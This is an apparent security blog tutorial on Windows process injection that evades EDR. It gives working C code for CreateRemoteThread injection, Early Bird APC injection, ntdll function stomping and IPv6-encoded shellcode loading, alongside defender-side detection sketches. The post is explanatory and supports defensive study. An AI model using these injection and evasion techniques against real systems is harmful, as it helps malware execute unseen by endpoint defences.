Process Injection Without the Obvious Thread: Early Bird APC and Beyond

The first process injection code most people write looks something like this:

c
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPid);
LPVOID pMem = VirtualAllocEx(hProcess, NULL, dllPathLen, MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(hProcess, pMem, dllPath, dllPathLen, NULL);
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0,
    (LPTHREAD_START_ROUTINE)GetProcAddress(
        GetModuleHandleA("kernel32.dll"), "LoadLibraryA"),
    pMem, 0, NULL);
WaitForSingleObject(hThread, INFINITE);

It works. On a machine with nothing watching, it will happily inject your DLL into any process you have a handle to. On a machine with an EDR, this is roughly equivalent to holding up a sign that says “I AM DOING INJECTION RIGHT NOW.”

Every step in that sequence generates telemetry. The OpenProcess call with PROCESS_ALL_ACCESS triggers the handle-operation callbacks that drivers register through ObRegisterCallbacks. VirtualAllocEx committing fresh memory in a remote process is flagged. WriteProcessMemory across processes is logged. CreateRemoteThread fires the thread-creation callbacks that drivers register via PsSetCreateThreadNotifyRoutine, and essentially every EDR registers one. The LoadLibraryA start address and the DLL path sitting in the remote process’s memory are both suspicious. There is not a single step that a competent EDR misses.
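From the defender’s side, that sequence is easy to correlate. Here is a minimal sketch, assuming a hypothetical event stream in which each cross-process operation has already been reduced to an event kind plus a source and target PID. The `inj_event` struct, the `EV_*` names, and `looks_like_classic_injection` are illustrative only and are not any product’s schema.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical, simplified event kinds; real sensors expose far richer data. */
enum ev_kind {
    EV_OPEN_PROCESS,
    EV_REMOTE_ALLOC,
    EV_REMOTE_WRITE,
    EV_REMOTE_THREAD
};

struct inj_event {
    enum ev_kind kind;
    uint32_t source_pid;
    uint32_t target_pid;
};

/* Returns 1 if the events contain open -> alloc -> write -> thread, in that
 * order, from one source PID against one target PID. Events for other PID
 * pairs, and out-of-order events, are skipped. */
int looks_like_classic_injection(const struct inj_event *ev, size_t n,
                                 uint32_t source_pid, uint32_t target_pid)
{
    static const enum ev_kind expected[] = {
        EV_OPEN_PROCESS, EV_REMOTE_ALLOC, EV_REMOTE_WRITE, EV_REMOTE_THREAD
    };
    const size_t stages = sizeof(expected) / sizeof(expected[0]);
    size_t stage = 0;

    for (size_t i = 0; i < n && stage < stages; i++) {
        if (ev[i].source_pid != source_pid || ev[i].target_pid != target_pid)
            continue;
        if (ev[i].kind == expected[stage])
            stage++;
    }
    return stage == stages;
}
```

A real rule would also bound the time window and weigh the access mask and start address, but even this toy version shows why the four-call pattern stands out.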

The question is what you do about it.

The thread creation problem

The most noticeable signal is the remote thread. Thread creation in another process is unusual enough that it’s worth flagging on its own; not many legitimate programs do it. The kernel synchronously invokes every callback registered via PsSetCreateThreadNotifyRoutine before the new thread starts executing. The callback cannot veto the thread directly, but the EDR gets to see the new thread, inspect its start address and the memory it’s about to run, and decide how to respond.

If your injected code is in a freshly-allocated PAGE_EXECUTE_READWRITE region, the EDR sees exactly what you’re doing. If it’s in a region that was executable before (like a code section you stomped), that’s less obviously malicious — but now you’ve modified existing memory in a signed module, which is its own problem.

The other issue with CreateRemoteThread is that it’s a blunt instrument. You create a thread, it runs your code, it exits. The thread’s brief existence is visible in process explorers, ETW traces, and any monitoring that watches the thread list.

Early Bird APC

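APCs (Asynchronous Procedure Calls) are a kernel mechanism for queuing deferred work to a specific thread. A user-mode APC does not run immediately: it waits until the thread enters an alertable wait (SleepEx, WaitForSingleObjectEx, and similar calls with the alertable flag set). At that point the pending APCs drain, and the thread executes each queued APC function before continuing its wait. This is used legitimately for async I/O completion.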
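The queue-then-drain behaviour is easier to see in a toy model. The sketch below is plain C and does not call the Windows API. `toy_thread`, `toy_queue_apc`, `toy_wait`, and `toy_bump` are hypothetical names invented for illustration, and the model ignores kernel-mode APCs entirely.

```c
#include <stddef.h>

#define APC_QUEUE_MAX 8

typedef void (*apc_fn)(void *arg);

/* Toy stand-in for one thread's user-mode APC queue. */
struct toy_thread {
    apc_fn fn[APC_QUEUE_MAX];
    void  *arg[APC_QUEUE_MAX];
    size_t count;
};

/* Queue work for the thread. Nothing runs yet. Returns 0 if the queue is full. */
int toy_queue_apc(struct toy_thread *t, apc_fn fn, void *arg)
{
    if (t->count == APC_QUEUE_MAX)
        return 0;
    t->fn[t->count] = fn;
    t->arg[t->count] = arg;
    t->count++;
    return 1;
}

/* Model of a wait: only an alertable wait drains the queue, in FIFO order.
 * Returns the number of APC routines that ran. */
size_t toy_wait(struct toy_thread *t, int alertable)
{
    if (!alertable)
        return 0;
    size_t ran = t->count;
    for (size_t i = 0; i < ran; i++)
        t->fn[i](t->arg[i]);
    t->count = 0;
    return ran;
}

/* Example APC routine: increments the int it is handed. */
void toy_bump(void *arg)
{
    (*(int *)arg)++;
}
```

Queuing `toy_bump` and then calling `toy_wait(&t, 0)` leaves the counter untouched; only `toy_wait(&t, 1)` runs it. The real mechanism has the same property: a queued APC sits idle until its thread becomes alertable.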

The Early Bird technique uses this differently. Instead of creating a thread in the target, you create a new process in suspended state and queue an APC to its main thread before it ever runs:

c
STARTUPINFOA si = { sizeof(si) };
PROCESS_INFORMATION pi = {};

// Create suspended — main thread exists but hasn't run yet
CreateProcessA(NULL, "C:\\Windows\\System32\\notepad.exe",
    NULL, NULL, FALSE,
    CREATE_SUSPENDED, NULL, NULL, &si, &pi);

// Allocate shellcode in the new process
LPVOID pShellcode = VirtualAllocEx(pi.hProcess, NULL,
    shellcodeLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, pShellcode,
    shellcode, shellcodeLen, NULL);

// Queue an APC to the main thread pointing at our shellcode
QueueUserAPC((PAPCFUNC)pShellcode, pi.hThread, 0);

// Resume — the APC drains before the process entry point runs
ResumeThread(pi.hThread);

CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);

The key difference: QueueUserAPC does not create a thread. The APC runs in the existing thread context, the main thread of the new process, before that thread’s normal execution path starts. When the thread is resumed, it begins in ntdll’s initialization code, and the pending user-mode APC is delivered as part of that startup, before control reaches the image’s entry point. Your shellcode runs. If it returns cleanly, the main thread continues to the process entry point, which never sees anything unusual.

There’s no CreateRemoteThread call, so no remote thread creation notification fires. The process-creation callback still does, and a child process spawned suspended is a signal in its own right. The new process runs your code as a side-effect of its normal startup sequence. EDRs that watch purely for remote thread creation miss this entirely. Those that watch APC queues catch it, but the signal is subtler: legitimate programs do queue APCs, just not to freshly-created processes with shellcode in their memory.

The tradecraft improvement is real, but the fundamental visibility problem remains: the shellcode still sits in a freshly-allocated RWX region. That’s a separate concern.
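To make that visibility problem concrete, here is a rough sketch of the check a memory scanner might apply to each region it walks. It assumes the scanner has already filled in the state, protection, and type fields that VirtualQueryEx reports. The `region_info` struct, the `SK_`-prefixed constants (values copied from the Windows SDK headers so the block builds anywhere), and `classify_region` are names invented for this example.

```c
#include <stdint.h>

/* Values as defined in the Windows SDK; prefixed to avoid clashing with it. */
#define SK_PAGE_EXECUTE            0x10u
#define SK_PAGE_EXECUTE_READ       0x20u
#define SK_PAGE_EXECUTE_READWRITE  0x40u
#define SK_PAGE_EXECUTE_WRITECOPY  0x80u
#define SK_MEM_COMMIT              0x1000u
#define SK_MEM_PRIVATE             0x20000u

/* Hypothetical subset of what VirtualQueryEx reports for one region. */
struct region_info {
    uint32_t state;    /* MEM_COMMIT, MEM_RESERVE, MEM_FREE */
    uint32_t protect;  /* PAGE_* protection flags */
    uint32_t type;     /* MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE */
};

enum region_verdict {
    REGION_OK,            /* nothing notable */
    REGION_PRIVATE_EXEC,  /* executable, but not backed by an image or file */
    REGION_PRIVATE_RWX    /* as above, and writable at the same time */
};

enum region_verdict classify_region(const struct region_info *r)
{
    const uint32_t exec_mask = SK_PAGE_EXECUTE | SK_PAGE_EXECUTE_READ |
                               SK_PAGE_EXECUTE_READWRITE |
                               SK_PAGE_EXECUTE_WRITECOPY;

    if (r->state != SK_MEM_COMMIT)
        return REGION_OK;
    if (r->type != SK_MEM_PRIVATE)
        return REGION_OK;
    if ((r->protect & exec_mask) == 0)
        return REGION_OK;
    if (r->protect & SK_PAGE_EXECUTE_READWRITE)
        return REGION_PRIVATE_RWX;
    return REGION_PRIVATE_EXEC;
}
```

JIT engines also produce private executable memory, so a verdict like this is a lead to investigate, not proof of injection.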

Function stomping

One approach to the “suspicious new allocation” problem: don’t allocate new memory. Instead, stomp an existing function in the target process.

Find a function that’s large enough to hold your shellcode and that the target process is unlikely to call during your operation window. Write your shellcode over it. Execute it (via APC or any other trigger). Clean up — restore original bytes afterward if you need the process to survive.

c
// Find a suitable function in the target — something large enough,
// unlikely to be called during execution
LPVOID pTarget = GetProcAddress(
    GetModuleHandleA("ntdll.dll"), "NtSetSystemInformation");
// pTarget is in ntdll's .text section, already executable, not RWX

// No explicit VirtualProtectEx call is needed here: when the target pages
// are executable but not writable, WriteProcessMemory temporarily changes
// their protection itself, writes, and then restores it
WriteProcessMemory(hProcess, pTarget,
    shellcode, shellcodeLen, NULL);

QueueUserAPC((PAPCFUNC)pTarget, hThread, 0);

The advantage: the shellcode occupies an address that was already executable, already in a legitimate module’s address range. No new PAGE_EXECUTE_READWRITE allocation appears in the process’s memory map. A scanner looking for “RWX regions” or “executable regions not backed by a file mapping” finds nothing.

The disadvantage: you’ve modified the text section of a loaded module. The write also forces copy-on-write, so the touched pages become private copies that no longer match the image on disk. If anything in the target reads NtSetSystemInformation’s bytes for integrity checking, or actually calls it, you have a problem. And restoring original bytes after execution adds complexity.
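The integrity check that catches this is conceptually simple. The sketch below assumes the checker has already obtained two equally sized buffers: the bytes of a code range as they sit in the process, and the same range read from the file on disk with relocations applied. Both function names are hypothetical, and a real checker would also have to allow for legitimate hot patches.

```c
#include <stddef.h>
#include <stdint.h>

/* Returns the offset of the first byte where the in-memory copy differs
 * from the reference copy, or len if the two are identical. */
size_t first_modified_offset(const uint8_t *in_memory,
                             const uint8_t *reference, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        if (in_memory[i] != reference[i])
            return i;
    }
    return len;
}

/* Counts how many bytes differ, which gives a rough sense of whether the
 * change is a small inline hook or a wholesale overwrite. */
size_t count_modified_bytes(const uint8_t *in_memory,
                            const uint8_t *reference, size_t len)
{
    size_t changed = 0;
    for (size_t i = 0; i < len; i++) {
        if (in_memory[i] != reference[i])
            changed++;
    }
    return changed;
}
```

A stomped function shows up as a long run of differing bytes starting at the function’s first byte, which looks nothing like a typical five-byte inline hook.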

Shellcode encoding: the IPv6 trick

One technique worth documenting leans on one of Windows’s own APIs to decode stored shellcode. Instead of keeping a buffer of raw bytes in the loader, encode the shellcode as an array of IPv6 addresses, store them as strings, and decode them at runtime using RtlIpv6StringToAddressA.

Each IPv6 address is 16 bytes. Your shellcode gets split into 16-byte chunks and encoded as valid IPv6 address strings:

c
// Encoded shellcode as IPv6 addresses
const char *ipv6_chunks[] = {
    "fc48:83e4:f0e8:c000:0000:4151:4150:5251",
    "5648:31d2:6548:8b52:6048:8b52:1848:8b52",
    // ...
};

// Decode at runtime into an executable buffer
BYTE decoded[shellcodeLen];
for (int i = 0; i < chunkCount; i++) {
    SOCKADDR_IN6 addr = {};
    RtlIpv6StringToAddressA(ipv6_chunks[i],
        NULL, &addr.sin6_addr);
    memcpy(decoded + i * 16, &addr.sin6_addr, 16);
}

The shellcode never exists as a recognisable byte sequence in your loader binary — static scanners see IP address strings. The decode happens at runtime using a legitimate Windows networking API. This is primarily useful for static analysis evasion of the loader itself, not for hiding the shellcode once it’s been decoded and placed in memory.
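The flip side is that a table of fully expanded IPv6 literals is itself a recognisable pattern. As a sketch of how a static scanner might look for it, the following assumes the strings have already been extracted from the binary. `is_full_ipv6_literal` and `count_full_ipv6_literals` are hypothetical helpers, and the parser deliberately accepts only the uncompressed eight-group form, which is what this kind of encoding produces.

```c
#include <ctype.h>
#include <stddef.h>

/* Returns 1 if s is exactly eight colon-separated groups of 1 to 4 hex
 * digits, with no "::" compression and no trailing characters. */
int is_full_ipv6_literal(const char *s)
{
    int groups = 0;

    while (*s) {
        int digits = 0;
        while (isxdigit((unsigned char)*s)) {
            digits++;
            s++;
        }
        if (digits < 1 || digits > 4)
            return 0;
        groups++;
        if (*s == ':') {
            s++;
            if (*s == '\0')
                return 0;   /* trailing colon */
        } else if (*s != '\0') {
            return 0;       /* unexpected character */
        }
    }
    return groups == 8;
}

/* Counts how many of the extracted strings are full-form IPv6 literals. */
size_t count_full_ipv6_literals(const char *const *strings, size_t n)
{
    size_t hits = 0;
    for (size_t i = 0; i < n; i++) {
        if (is_full_ipv6_literal(strings[i]))
            hits++;
    }
    return hits;
}
```

Networking software legitimately embeds addresses, so the count only becomes interesting when it is large and the binary has no other reason to carry dozens of addresses. Where to set that threshold is a judgment call.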

The detection angle

All of these techniques reduce the telemetry surface, but they don’t eliminate it. Early Bird still requires allocating and writing memory in the target, and it still triggers the process-creation and page allocation events that behavioural EDRs watch; it skips OpenProcess only because CreateProcess already hands back handles to the new process and its main thread. Function stomping modifies module text sections, which integrity monitoring that compares loaded code against the on-disk image detects. (HVCI protects kernel-mode code pages, so it is not what catches a user-mode stomp.) IPv6 encoding is a static evasion only: once the shellcode is executing, it’s executable memory that didn’t exist before.

The deeper evasion — making none of this visible at the kernel callback level — requires going below the kernel. If the callbacks that EDRs register via PsSetCreateThreadNotifyRoutine, PsSetCreateProcessNotifyRoutine, and PsSetLoadImageNotifyRoutine never fire, the EDR has no telemetry. That requires operating from a position where you control what the kernel sees, which is the domain of the hypervisor series. The EPT shadow hook approach from Part 3 lets you intercept the notification mechanism itself.

For anything running entirely in the guest, the detection surface is a matter of degree, not of kind.